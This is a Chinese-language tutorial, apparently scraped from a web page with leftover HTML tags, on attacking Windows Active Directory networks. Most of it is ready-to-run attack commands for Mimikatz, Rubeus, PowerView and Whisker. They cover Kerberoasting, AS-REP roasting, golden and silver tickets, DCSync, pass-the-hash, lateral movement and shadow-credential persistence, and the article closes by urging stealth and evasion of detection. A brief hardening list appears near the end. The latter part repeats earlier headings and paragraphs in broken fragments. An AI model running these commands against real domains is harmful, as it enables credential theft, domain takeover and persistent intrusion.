内网活动目录利用方法详解<\/h1>

一、活动目录基础概念<\/h2>
活动目录（Active Directory，AD）是微软提供的目录服务，用于集中管理网络资源，包括用户、计算机、组策略等。<\/p>

核心组件<\/h3>

域控制器（DC）<\/strong>：运行AD服务的服务器<\/li>
域（Domain）<\/strong>：安全边界和管理单元<\/li>
森林（Forest）<\/strong>：一个或多个域的集合<\/li>
组织单位（OU）<\/strong>：用于组织和管理AD对象<\/li>

组策略（GPO）<\/strong>：集中配置管理工具<\/li> <\/ul>
二、信息收集技术<\/h2>
1. 基础信息收集<\/h3>
# 获取当前域信息 net view \/domain net config workstation # 获取域控制器 nltest \/dclist:<domain> <\/code><\/pre> 2. 使用PowerShell收集<\/h3> # 获取域信息<\/span> <\/span><\/span>Get-ADDomain <\/span><\/span> <\/span><\/span># 获取域控制器<\/span> <\/span><\/span>Get-ADDomainController <\/span><\/span> <\/span><\/span># 枚举域用户<\/span> <\/span><\/span>Get-ADUser -Filter * -Properties * <\/span><\/span> <\/span><\/span># 枚举域计算机<\/span> <\/span><\/span>Get-ADComputer -Filter * -Properties * <\/span><\/span><\/code><\/pre>3. 使用BloodHound工具<\/h3> BloodHound是AD环境可视化分析工具，可展示攻击路径。<\/p> 三、常见攻击方法<\/h2> 1. Kerberoasting攻击<\/h3> 利用服务账户的SPN获取TGS票据进行离线破解。<\/p> 攻击步骤：<\/strong><\/p> 枚举SPN<\/li> <\/ol> setspn -T <domain> -Q *\/* <\/span><\/span><\/code><\/pre> 请求TGS票据<\/li> <\/ol> Add-Type -AssemblyName System.IdentityModel <\/span><\/span>New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SPN"<\/span> <\/span><\/span><\/code><\/pre> 导出票据<\/li> <\/ol> Invoke-Mimikatz -Command '"kerberos::list \/export"'<\/span> <\/span><\/span><\/code><\/pre>2. AS-REP Roasting攻击<\/h3> 针对不需要预认证的账户。<\/p> 攻击步骤：<\/strong><\/p> Get-ADUser -Filter {DoesNotRequirePreAuth -eq<\/span> $True} -Properties DoesNotRequirePreAuth <\/span><\/span>Rubeus.exe asreproast \/format:<\/span>hashcat \/outfile:<\/span>hashes.txt <\/span><\/span><\/code><\/pre>3. 黄金票据攻击<\/h3> 利用krbtgt账户的NTLM哈希伪造TGT。<\/p> **攻击步骤：<\/p> Invoke-Mimikatz -Command '"kerberos::golden \/user:Administrator \/domain:<domain> \/sid:<domain-sid> \/krbtgt:<krbtgt-hash> \/ptt"'<\/span> <\/span><\/span><\/code><\/pre>4. 白银票据攻击<\/h3> 伪造特定服务的TGS票据。<\/p> Invoke-Mimikatz -Command '"kerberos::golden \/user:Administrator \/domain:<domain> \/sid:<domain-sid> \/target:<target-server> \/service:<service> \/rc4:<service-account-hash> \/ptt"'<\/span> <\/span><\/span><\/code><\/pre>5. DCSync攻击<\/h3> 模拟域控制器同步账户密码哈希。<\/p> Invoke-Mimikatz -Command '"lsadump::dcsync \/user:<domain>\<username>"'<\/span> <\/span><\/span><\/code><\/pre>四、权限提升方法<\/h2> 1. 滥用ACL权限<\/h3> 检查用户对高权限对象的修改权限：<\/p> Find-InterestingDomainAcl | ? {$_.IdentityReferenceName -match<\/span> "<username>"<\/span>} <\/span><\/span><\/code><\/pre>2. 滥用组策略<\/h3> 查找有修改权限的GPO<\/li> <\/ol> Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -match<\/span> "<username>"<\/span>} <\/span><\/span><\/code><\/pre> 修改GPO添加后门<\/li> <\/ol> 3. 滥用委派权限<\/h3> 查找非约束委派主机<\/li> <\/ol> Get-DomainComputer -Unconstrained | select name <\/span><\/span><\/code><\/pre> 查找约束委派<\/li> <\/ol> Get-DomainComputer -TrustedToAuth | select name <\/span><\/span><\/code><\/pre>五、横向移动技术<\/h2> 1. Pass-the-Hash<\/h3> Invoke-WMIExec -Target <target> -Domain <domain> -Username <user> -Hash <hash> -Command "cmd \/c <command>"<\/span> <\/span><\/span><\/code><\/pre>2. Overpass-the-Hash<\/h3> Invoke-Mimikatz -Command '"sekurlsa::pth \/user:<user> \/domain:<domain> \/ntlm:<hash> \/run:powershell.exe"'<\/span> <\/span><\/span><\/code><\/pre>3. 远程服务执行<\/h3> Invoke-PSExec -ComputerName <target> -Command "cmd \/c <command>"<\/span> -Username <user> -Password <password> <\/span><\/span><\/code><\/pre>六、持久化技术<\/h2> 1. 黄金票据<\/h3> (见上文黄金票据攻击)<\/p> 2. 影子凭证<\/h3> Whisker.exe add \/target:<\/span><computer> \/domain:<\/span><domain> \/dc:<\/span><dc> \/path:<\/span>cert.pfx \/password:<\/span>Passw0rd! <\/span><\/span><\/code><\/pre>3. DSRM密码同步<\/h3> Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'<\/span> <\/span><\/span><\/code><\/pre>七、防御检测方法<\/h2> 1. 监控异常行为<\/h3> 异常Kerberos票据请求<\/li> 异常DCSync操作<\/li> 异常ACL修改<\/li> <\/ul> 2. 加固建议<\/h3> 禁用不必要的预认证<\/li> 限制委派权限<\/li> 定期轮换krbtgt账户密码<\/li> 启用LSA保护<\/li> 监控敏感账户活动<\/li> <\/ol> 八、工具推荐<\/h2> BloodHound<\/strong> - AD环境可视化分析<\/li> Impacket<\/strong> - 网络协议攻击套件<\/li> Mimikatz<\/strong> - 凭据提取工具<\/li> Rubeus<\/strong> - Kerberos攻击工具<\/li> PowerView<\/strong> - AD信息收集工具<\/li> <\/ol> 总结<\/h2> 内网活动目录渗透是一个系统性的过程，需要结合信息收集、权限提升、横向移动和持久化等技术。理解AD的工作原理和安全机制是成功渗透的关键，同时也要注意操作隐蔽性和规避检测。<\/p>

内网活动目录利用方法详解<\/h1>

一、活动目录基础概念<\/h2> 活动目录（Active Directory，AD）是微软提供的目录服务，用于集中管理网络资源，包括用户、计算机、组策略等。<\/p>

二、信息收集技术<\/h2>

3. 使用BloodHound工具<\/h3> BloodHound是AD环境可视化分析工具，可展示攻击路径。<\/p>

三、常见攻击方法<\/h2>

四、权限提升方法<\/h2>

五、横向移动技术<\/h2>

六、持久化技术<\/h2>

1. 黄金票据<\/h3> (见上文黄金票据攻击)<\/p>

七、防御检测方法<\/h2>

总结<\/h2> 内网活动目录渗透是一个系统性的过程，需要结合信息收集、权限提升、横向移动和持久化等技术。理解AD的工作原理和安全机制是成功渗透的关键，同时也要注意操作隐蔽性和规避检测。<\/p>

一、活动目录基础概念<\/h2>
活动目录（Active Directory，AD）是微软提供的目录服务，用于集中管理网络资源，包括用户、计算机、组策略等。<\/p>

3. 使用BloodHound工具<\/h3>
BloodHound是AD环境可视化分析工具，可展示攻击路径。<\/p>

1. 黄金票据<\/h3>
(见上文黄金票据攻击)<\/p>

总结<\/h2>
内网活动目录渗透是一个系统性的过程，需要结合信息收集、权限提升、横向移动和持久化等技术。理解AD的工作原理和安全机制是成功渗透的关键，同时也要注意操作隐蔽性和规避检测。<\/p>